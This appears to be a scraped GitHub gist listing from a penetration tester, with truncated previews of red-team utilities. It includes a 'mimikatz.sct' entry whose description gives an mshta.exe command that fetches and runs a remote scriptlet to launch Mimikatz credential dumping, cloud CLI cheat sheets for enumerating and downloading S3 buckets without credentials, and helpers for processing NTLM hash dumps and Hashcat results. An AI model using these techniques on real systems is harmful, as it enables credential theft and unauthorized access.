I hereby claim:
- I am chrismaddalena on github.
- I am cmaddalena (https://keybase.io/cmaddalena) on keybase.
- I have a public key whose fingerprint is 800F B00B 11E2 188E F282 CF85 9DE9 9873 F1A0 5629
To claim this, I am signing this object:
Christopher Maddalena chrismaddalena
chrismaddalena
/ keybase.md
Last active
April 15, 2016 00:11
chrismaddalena
/ ZipperCombine.py
Created
April 11, 2016 19:22
Take two lists and combines them into one with alternating lines from each, like a zipper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import sys | |
| import os | |
| fileOne = sys.argv[1] | |
| fileTwo = sys.argv[2] | |
| with open(fileOne, 'r') as one, open(fileTwo, 'r') as two, open('combined.txt', 'w') as output: |
chrismaddalena
/ mimikatz.sct
Created
February 3, 2018 09:55
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
chrismaddalena
/ aws.csv
Last active
August 22, 2018 19:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Service | Description | Command | |
|---|---|---|---|
| IAM | Create a profile with a set of keys | aws configure --profile PROFILE_NAME | |
| IAM | Get account information | aws --profile PROFILE_NAME iam get-user | |
| IAM | Get attached policies for user | aws --profile PROFILE_NAME iam list-attached-user-policies --user-name USERNAME | |
| IAM | Get a policy's version information | aws --profile flaws iam get-policy - policy-arn POLICY_ARN_STRING | |
| IAM | Get policy details | aws --profile PROFILE_NAME iam get-policy-version --policy-arn POLICY_ARN_STRING --version-id VERSION_NUMBER | |
| S3 | List contents of an S3 bucket (without creds) | aws s3 ls s3://BUCKET_NAME --no-sign-request | |
| S3 | List contents of an S3 bucket (with creds) | aws s3 ls s3://BUCKET_NAME --profile PROFILE_NAME | |
| S3 | Download contents of an S3 bucket | aws s3 sync s3://BUCKET_NAME/ . --no-sign-request |
chrismaddalena
/ compute.csv
Last active
January 3, 2020 13:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Service | Description | Command | |
|---|---|---|---|
| User | List logged-in users | gcloud auth list | |
| User | Switch active user | gcloud config set account 'ACCOUNT' | |
| User | Logout an account | gcloud auth revoke --all or gcloud auth revoke 'ACCOUNT' | |
| Storage | List buckets | gsutil ls | |
| Storage | Copy object from bucket | gsutil cp gs://BUCKET_NAME/FILENAME . | |
| VM | List virtual machine instances | gcloud compute instances list | |
| VM | List virtual machine snapshots | gcloud compute snapshots list |
chrismaddalena
/ azure.csv
Last active
August 22, 2018 20:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Service | Description | Command | |
|---|---|---|---|
| CLI | Search for a command | az find -q KEYWORD | |
| CLI | List all subcommands | az --help and az SUBGROUP --help | |
| Account | List authenticated accounts | az account list --output table | |
| Account | Set the active subscription | az account set --subscription 'SUBSCRIPTION NAME' | |
| File Share | List file storage accounts | az storage account list | |
| VM | List virtual machines | az vm list --output table | |
| VM | List machine snapshots | az snapshot list --output table |
chrismaddalena
/ compare_dumps.py
Last active
April 15, 2019 13:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def compare_dumps(first_hashdump, second_hashdump): | |
| """Compare the two password dumps and return a dictionary of the results. JSON output: | |
| { | |
| "accounts": { | |
| "CHRISM": { | |
| "enabled": true, | |
| "pwdlastset": "2019-04-14 22:53:08", | |
| "domain": "DOMAIN.COM" | |
| }, | |
| "matching_accounts": {} |
chrismaddalena
/ process_hashes.py
Created
April 15, 2019 13:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def process_hashes(hash_file): | |
| """Process the hashes in the provided file and return a dictionary.""" | |
| # Create hashes of the hashes, lol | |
| with open(hash_file, 'r') as hash_dump: | |
| hashes = {} | |
| for line in hash_dump: | |
| # Ignore machine accounts | |
| if not '$' in line: | |
| # Separate DOMAIN\USER from NTLM and USER from DOMAIN | |
| array = line.split(':::') |
chrismaddalena
/ process_potfile.py
Created
April 15, 2019 13:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def process_potfile(hashcat_potfile): | |
| """Process the provided Hashcat potfile to return a dictionary of hash values and plaintext values.""" | |
| with open(hashcat_potfile, 'r') as potfile: | |
| potfile_hashes = {} | |
| for line in potfile: | |
| # This doesn't account for potfile entries for NTLMv2, etc. | |
| array = line.split(':') | |
| if len(array) > 2: | |
| pass | |
| else: |
chrismaddalena
/ sanitize_hash.py
Created
April 15, 2019 13:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def sanitize(string): | |
| """Sanitize the provided string by replacing chunks with asterisks.""" | |
| sanitized_string = string | |
| length = len(string) | |
| if length == 32: | |
| sanitized_string = string[0:4] + "*"*(length-8) + string[length-5:length-1] | |
| elif length > 2: | |
| sanitized_string = string[0] + "*"*(length-2) + string[length-1] | |
| return sanitized_string |
OlderNewer